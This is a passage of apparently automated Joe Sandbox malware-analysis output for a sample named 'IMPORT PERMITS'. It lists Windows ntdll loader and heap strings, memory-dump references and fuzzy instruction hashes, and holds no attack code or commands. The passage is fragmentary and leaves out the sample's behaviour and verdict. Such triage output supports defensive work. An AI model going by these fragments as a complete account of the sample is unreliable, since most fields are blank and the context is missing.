                                                                                                                                • LdrpDynamicShimModule, xrefs: 0144A998
                                                                                                                                • apphelp.dll, xrefs: 01402462
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0144A992
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0144A9A2
                                                                                                                                Strings
                                                                                                                                • x,, xrefs: 014620EB
                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 014620F3
                                                                                                                                • LdrpInitializationFailure, xrefs: 014620FA
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01462104
                                                                                                                                Strings
                                                                                                                                • HEAP: , xrefs: 013F3264
                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013F327D
                                                                                                                                • HEAP[%wZ]: , xrefs: 013F3255
                                                                                                                                Strings
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                Strings
                                                                                                                                • String ID: $@
                                                                                                                                Strings
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                Strings
                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0144A10F
                                                                                                                                • LdrpCheckModule, xrefs: 0144A117
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0144A121
                                                                                                                                Strings
                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                Strings
                                                                                                                                • PreferredUILanguages, xrefs: 0149C212
                                                                                                                                • @, xrefs: 0149C1F1
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0149C1C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                Strings
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01464888
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01464899
                                                                                                                                • LdrpCheckRedirection, xrefs: 0146488F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: #%u
                                                                                                                                Strings
                                                                                                                                • LdrResSearchResource Exit, xrefs: 013EAA25
                                                                                                                                • LdrResSearchResource Enter, xrefs: 013EAA13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `$`
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$MUI
                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013E063D
                                                                                                                                • kLsE, xrefs: 013E0540
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 013EA2FB
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 013EA309
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GlobalTags
                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .mui
                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EXT-
                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryHash
                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #
                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryName
                                                                                                                                • API String ID: 0-215506332
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: x,
                                                                                                                                • API String ID: 0-2438440526
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: x,
                                                                                                                                • API String ID: 0-2438440526
                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0146895E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                                • Instruction ID: 5da5a3996bf2010d8d8983b1fe9a2079cd277c85955a2a66ede71ca36ce93011
                                                                                                                                • Opcode Fuzzy Hash: 1a49cb9a468100adff37216cb107f22ac1b7255148589b2d5602214b140aa91a
                                                                                                                                • Instruction Fuzzy Hash: 2632FD70A007558BEB24CF69C8447BFBBF2BF86304F25412ED58A9B3A5D735A846CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                                • Instruction ID: 0ff0f30829ca39a49a23d2fa541f49e5ee9c3122d8feeccf27ae37657f42812f
                                                                                                                                • Opcode Fuzzy Hash: 24fc9bd5ebfac65ea7d7d341668f4363a8f2db35d752608f0fcf7f9083d3a703
                                                                                                                                • Instruction Fuzzy Hash: B422D3702046618BEB25EF2DC05437BBBF1AF44304F28845BD9868F3A6E7B5D492DB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                                • Instruction ID: 8b4f668b9c69951f661efc220c55c937e03e805e4f437b94b67ffe9bde0ec240
                                                                                                                                • Opcode Fuzzy Hash: d7bec097cc1cefeadff37fbe64e64b49a613222e444b87a6bd5dd50463ad0a3b
                                                                                                                                • Instruction Fuzzy Hash: 1B32AFB0A00315CFEB25CF69C484BAABBF5FF58314F14456AE95AAB7A1D730E841CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction ID: b891de2f69b47d95a517d057be954966a4c2d9bd1388ada9c2561ae1b67f330d
                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction Fuzzy Hash: F4F16671E006199BEF16CF9AD540BAEBBF5EF44710F09812AEA05AB3A1D774D842CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                                • Instruction ID: e9e48f4a1c5529318c8e9af38121d5668227ebb058e80608928460ac68977d0a
                                                                                                                                • Opcode Fuzzy Hash: 289cfee4cd52729ec8538b0f6e576fc5424ec98b051b6fcd049aff43a329bb10
                                                                                                                                • Instruction Fuzzy Hash: 76D1EF71A0060B8FDF15CF69C845AFFBBF1AF88304F18816AD955A7261E735E906CB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                                • Instruction ID: fa572029a252effae04f09d617941bd7b4a4d55e2249408b0531359051203a3c
                                                                                                                                • Opcode Fuzzy Hash: 557f818a14a837f7450579d727cc61c33617017e185c05d28a6363912a8e00d8
                                                                                                                                • Instruction Fuzzy Hash: 37E1BFB1608352CFC715CF28C094A6ABBE0FF99318F05896DF99987391DB31E905CB92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                                • Instruction ID: b6a4581217abeb047a10639b56bce8af52b21675016cd33b92d430edafe99c2c
                                                                                                                                • Opcode Fuzzy Hash: 27299fdaa12882ab0c01e606493b45f818ac66a7a9b0513f803fa6c23435237f
                                                                                                                                • Instruction Fuzzy Hash: D0D1F5B2A0020ADBDB14DF29D881BBA77B5FF9831CF05416EE915DB291EB30E951CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction ID: 44ab0811cfad166065785c4f2ab5b38e34a92fe0a794b1beabe20469c97b535d
                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction Fuzzy Hash: 54B16274A007069FDF24DF99C940AABBBBDBF94308F14446FEA02977A4DA34E945CB11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction ID: e3557333ed72418493fa1b608a326041dcab999ca0e7f2d06485aeb9852799e5
                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction Fuzzy Hash: 89B11531604646AFEB25DB6CC850BBEBBF6AF44204F18019EE656DB392D770E941CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                                • Instruction ID: 60f51e3c91445bc2926df8fb004d6bb3f868c364c5d039150278d807ade1dccf
                                                                                                                                • Opcode Fuzzy Hash: b975b50422d11fb22e03a62f820c5f2788261c82067ff51f0981b6235412e018
                                                                                                                                • Instruction Fuzzy Hash: 37C15674508341CFE764CF19C484BABB7E4BF88708F44496EE989972A1DB74E948CF92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                                • Instruction ID: 4d3a3a428d91499287170c3c9afc45ca6adbfec6ba8af8d85a0c003d8be00a5f
                                                                                                                                • Opcode Fuzzy Hash: a95ae47d7a994dbf3d921beaf524a5a9e58b94c48eb4ab58a2ff8552c39088df
                                                                                                                                • Instruction Fuzzy Hash: E1B1A271A1026A8BDB34CF59D890BA9B3B6EF44304F5485EED54AE7290EB30DD85CF20
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                                • Instruction ID: 7b6fd78770ca27f8ae490650b044c611b9c4392ec92f63cf784494c4588551ee
                                                                                                                                • Opcode Fuzzy Hash: ab2c759c4219135b59b29441a14af14cad8c1d945a0e13b294f1e58756897623
                                                                                                                                • Instruction Fuzzy Hash: F6A1F231E006559FEB22DBADC848BAEBBA4BB01714F05052BEA00BB3F1D7749D55CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                                • Instruction ID: 7d1c85ba3af67ebaf15b40dab73ae4a692652741ba670bdf19d13e91cf32b007
                                                                                                                                • Opcode Fuzzy Hash: e56c335dad11cd45ab2c2756fe7228ebf6ce2159f83a28f3f220e059d46ebc64
                                                                                                                                • Instruction Fuzzy Hash: 06A1D070B0062ADFDB25CF69C490BAAB7E1FF54314F44412BEA05973A2DB34E896CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                                • Instruction ID: 4a9a39f8b6de180e57222e06e334a27a63defa6ef1ab3ee422865b467b34630d
                                                                                                                                • Opcode Fuzzy Hash: ced242caf26ace2c46b9d8e4fcaa196197b47ef718e9e3b21ca8f8bb19d300c5
                                                                                                                                • Instruction Fuzzy Hash: 70A1C172504612DFCB11DF18C980BAAB7E5FF58714F49052EF64A9B762D334E901CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a9812ad2eac5667ee823411280f0986f95117339160bfe91213ade0e7f72a7ad
                                                                                                                                • Instruction ID: d7b2f6480e0bc6310c483177ba16615901bd49e29d692013530c4cdb5ded2998
                                                                                                                                • Opcode Fuzzy Hash: a9812ad2eac5667ee823411280f0986f95117339160bfe91213ade0e7f72a7ad
                                                                                                                                • Instruction Fuzzy Hash: 705159716083429FD754EF6AD880A6FBBE5BFD8604F48492EF589C7260E730D905CB52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction ID: af30a45fb0cf5054b0151aa92c9abae630a08d946ea21e14c8030bcdc4ca7cb5
                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction Fuzzy Hash: 80518071D0021AABDF16DF99C440BEEBBB9EF45354F08406AEA05AB3A0D774D945CB90
